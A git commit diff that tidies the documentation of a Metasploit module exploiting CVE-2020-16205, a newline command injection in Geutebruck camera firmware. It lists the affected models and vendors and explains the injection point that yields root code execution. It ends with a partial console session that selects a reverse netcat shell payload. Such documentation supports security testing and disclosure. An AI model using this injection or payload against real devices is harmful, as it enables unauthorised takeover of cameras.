Apply updates to make the English a bit neater r.e affected versions. Also applied updates to make the markdown have bullet points so it displays better. Finally modified up the module description to explain the actual issue a bit more, but it might still need work
This commit is contained in:
gwillcox-r7
parent
3c70f37dbe
commit
dc21773f10
|
|
@ -1,34 +1,41 @@
|
||||||
## Vulnerable Application
|
## Vulnerable Application
|
||||||
|
|
||||||
The following [Geutebruck](https://www.geutebrueck.com) products using firmware <= 1.12.0.25 and also the 1.12.13.2 and the 1.12.14.5:
|
The following [Geutebruck](https://www.geutebrueck.com) products using firmware versions <= 1.12.0.25,
|
||||||
Encoder and E2 Series Camera models:
|
firmware version 1.12.13.2 or firmware version 1.12.14.5:
|
||||||
G-Code:
|
* Encoder and E2 Series Camera models:
|
||||||
EEC-2xxx
|
* G-Code:
|
||||||
G-Cam:
|
* EEC-2xxx
|
||||||
EBC-21xx
|
* G-Cam:
|
||||||
EFD-22xx
|
* EBC-21xx
|
||||||
ETHC-22xx
|
* EFD-22xx
|
||||||
EWPC-22xx
|
* ETHC-22xx
|
||||||
|
* EWPC-22xx
|
||||||
|
|
||||||
Many brands use the same firmware:
|
Many brands use the same firmware:
|
||||||
UDP Technology (which is also the supplier of the firmware for the other vendors)
|
* UDP Technology (which is also the supplier of the firmware for the other vendors)
|
||||||
Ganz
|
* Ganz
|
||||||
Visualint
|
* Visualint
|
||||||
Cap
|
* Cap
|
||||||
THRIVE Intelligence
|
* THRIVE Intelligence
|
||||||
Sophus
|
* Sophus
|
||||||
VCA
|
* VCA
|
||||||
TripCorps
|
* TripCorps
|
||||||
Sprinx Technologies
|
* Sprinx Technologies
|
||||||
Smartec
|
* Smartec
|
||||||
Riva
|
* Riva
|
||||||
|
|
||||||
This module has been tested on a Geutebruck 5.02024 G-Cam/EFD-2250 running 1.12.14.5 firmware.
|
This module has been tested on a Geutebruck 5.02024 G-Cam EFD-2250 running firmware version 1.12.14.5.
|
||||||
|
|
||||||
### Description
|
### Description
|
||||||
|
|
||||||
This exploit a simple OS command injection (CVE-2020-16205) in the /uapi-cgi/admin/testaction.cgi page of the web interface.
|
This module exploits an authenticated OS command injection vulnerability (CVE-2020-16205) within the
|
||||||
Here is the advisory: https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03
|
`server` GET parameter of /uapi-cgi/admin/testaction.cgi when the `type` parameter is set to `ntp`.
|
||||||
|
This issue occurs due to a lack of validation on the `server` parameter, which allows an attacker to
|
||||||
|
inject a new line character, followed by the command they wish to execute, at which point the server will
|
||||||
|
then interpret the new string as a separate command to be executed. Successful exploitation will result in
|
||||||
|
remote code execution as the `root` user.
|
||||||
|
|
||||||
|
Users can find additional details of this vulnerability on the advisory page at https://us-cert.cisa.gov/ics/advisories/icsa-20-219-03.
|
||||||
|
|
||||||
## Verification Steps
|
## Verification Steps
|
||||||
|
|
||||||
|
|
@ -58,7 +65,6 @@ The password of the username used to authenticate on the admin page. **Default:
|
||||||
|
|
||||||
```
|
```
|
||||||
msf5 > use exploit/linux/http/geutebruck_testaction_exec
|
msf5 > use exploit/linux/http/geutebruck_testaction_exec
|
||||||
msf5 exploit(linux/http/geutebruck_testaction_exec) >
|
|
||||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
|
msf5 exploit(linux/http/geutebruck_testaction_exec) > set payload cmd/unix/reverse_netcat_gaping
|
||||||
payload => cmd/unix/reverse_netcat_gaping
|
payload => cmd/unix/reverse_netcat_gaping
|
||||||
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
|
msf5 exploit(linux/http/geutebruck_testaction_exec) > set httpusername root
|
||||||
|
|
|
||||||
Loading…
Reference in New Issue